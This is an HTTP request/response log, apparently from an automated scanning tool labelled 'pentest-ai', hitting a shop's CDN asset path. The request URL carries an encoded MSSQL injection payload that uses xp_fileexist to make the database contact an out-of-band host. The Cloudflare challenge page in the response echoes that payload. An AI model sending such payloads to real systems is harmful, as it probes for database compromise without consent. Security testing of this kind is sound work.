REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%3B%20DECLARE%20%40q%20VARCHAR%2899%29%3B%20SET%20%40q%3D%27%5C%5Ch0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%5Ca%27%3B%20EXEC%20master.dbo.xp_fileexist%20%40q%3B--%20-/assets/component-list-payment.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 10044
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847982cafa110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=ZdWtekRgQ8PRjPjP2GT1eHN6ubaWFwJTWCO8jbT8zv7jEJ5L9J6HqEWdICTLC%2F1V%2FRRh8R6er%2FAIs37bj77XQoSMNUqU4pgHJHZHkZEE7b8JTZ6EilH6uRYApT70zMDPt8Y0qXIonSIOxC1Tag%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847982cafa110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'arvHfgM_IM.3eFc8oO1.lmXD1C2ZHgnVUa3lo1yRfrk-1784281168-1.2.1.1-aqpD1U5rU7S5hDE3VC51CK6HLFEAIa_GgMWm04wUnFAx49rkiSfhvRbM_AAai019',cITimeS: '1784281168',cRay: 'a1c847982cafa110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-list-payment.css?__cf_chl_tk=T0bBYj5KlGbA.3kbiRPfQnSwsy1ooXa2vg7bI0uiF6k-1784281168-1.0.1.1-GP.wtIOZZKiEr5M5qaV2DMRBXUS613ArS68cw52YXmI",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-list-payment.css?__cf_chl_f_tk=T0bBYj5KlGbA.3kbiRPfQnSwsy1ooXa2vg7bI0uiF6k-1784281168-1.0.1.1-GP.wtIOZZKiEr5M5qaV2DMRBXUS613ArS68cw52YXmI",md: 'rOxfnnIiPQD5pspPnwRNe4Psg6PjiPy.QOzIxBBa6rw-1784281168-1.2.1.1-q1zrTSh8kD6D4pSVpb26.JjDBsGI5DRccVJqKIU510PfBD28l9wHNGwJXJSmn0E.Pad8SIv.mhFHADnJOCFtO4YvqeeZDo5KalV5.j9gFtt7XGql7ZDiCdovN42NHHV8WqU9WUL6fCx8TdyMnr3afPL4EZNZxukhYtMkA.qJPGvpz8etOn2EAY5wiiJBTHV3HqSISY9HJUdkL2WxoaeR3NPMjdB9CG_PT8DNVxJ.rj.A0u0mrJZTaGMiZ1SgIdj4rIfOd5jK9NvEbd6GzuTnuUT4stNQCXN1xnGExKx313UyVk.CvdywsEkicpGZhalKbecOZdv.h_h9fnnludYPNloUYPlXM_N3nHJpK_NwESl75HMiqq8NG0gW8y5sdGK_rc.JAM8Kp5hMYVexwYEqK6AJOB7QtnwTKdXegJsirMCztajRyGy90t8P6TUHQyOLRf3pkY4_NH27RsMecC2UrwZ4EvxMBEsL_bgT8reMK7WUqhxVhnQwe99hqVePxiW8M3SrOMD6n5ZaiY5W8A9DdFnbHU62mAYAAab_RJVxy0DRgK4Q9k6wM.xbpsu1gXG1NFe34pt3su3E5kuJ59b1oFvDoxmwGpcPl39ML52qc8DYclKhxH02ryXfjmTUldmNfgSaFa0Qt7jTAeUNeCn5aOyX_Q.91O9Ac0MFi9.GWDx6k8BJlm6vAdPZxOToOYdc21GQJQlJu8AcSovQOq60S53hN_NymDosNgI965ZbP8TfIWI9DxxWylHjpgFgp3Z4it5l.M1NrLQqigrwkfGLTp6P_N5BCpLOPpsCzxh7LeDSgbmM_.h39mX9XUsqUTCuVHDr8KR32zti4RP5c6PgxgKhEyZUezsZ3KinQEUo3J0EeSGXonDSvoMVLyZ4oWAv.s6XTtcBNC5eN4L5Q28iMzCrlJYNL3DVO9lHdWOxWTMkMYGfGvN1XKqicLXOEzyCh2IF22f2P35T3RbLnmjekUm4aNAc0iFIE1N14Ql8bHx4JSZWrYYIL2H9ev3VibOXopJvLOZbO29VvPhrHybvfY5oeDnDK4QkiJnATjQ2DAN_jE6rDAQxMC0MeNvEb6A2p2Q.9rq_euZB7o90MCIkUvTCWhePoyHDEuRiB7NvBMasMC5v4OiYIqL_hDb.3BNDwXcfaxwJotepiHhw_poItMFZSZH6pDqfVfRc6gx8_MqJhMGkqGyByi0bCAX8X_aaO4CaaLovM50CCNTBDgNg2FSAmCkbkdJZJTaZAg4.bxR0n8iuQj0wtDMX5pDOWVuradMTFvT87KnSMYP1IvzPRzYSL0rjfn4WPU0EnYFfbYNHS2EUHZOxZk4hpxZhkZGPQMgf_O5.t0NPK_lmVDCfxjrPwhznY9Og_CziSRguCUXpR6xZSDTrk3M62crGM32agfgaeP4o.MCHIACiXb7AwQ',mdrd: 'i.TkltlE1MKvI9ndmb7xh6oUl.MTmF.8P7XchusBcb8-1784281168-1.2.1.1-nMm.WxRzsZUSehaslS_lKoWl5Jw5CHzkAoDa_vLUsOuOPQnE26be5Q96AYbSohjUqrZp19Qm985nE.VGYBODPqql0S36j37pv54ckphRDAVEkg9oFtAnHh28vbudD0Dmwb.WDDodoVXGWg_37z5jPVhciXf0Epx3lGxt2CZhYeHafbL7HHN43HoYXHpxc5M_bFg2kUpposZQRsCeOSxi9vMJg9UZZSSuDvIqMNPDH1sqXJPiutdn8.lDVJAUSoQb',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847982cafa110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/';%20DECLARE%20@q%20VARCHAR(99);%20SET%20@q='%5C%5Ch0cqg45t8jh21623dc0zoi81ftlixdu9x.oast.fun%5Ca';%20EXEC%20master.dbo.xp_fileexist%20@q;--%20-/assets/component-list-payment.css?__cf_chl_rt_tk=T0bBYj5KlGbA.3kbiRPfQnSwsy1ooXa2vg7bI0uiF6k-1784281168-1.0.1.1-GP.wtIOZZKiEr5M5qaV2DMRBXUS613ArS68cw52YXmI"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
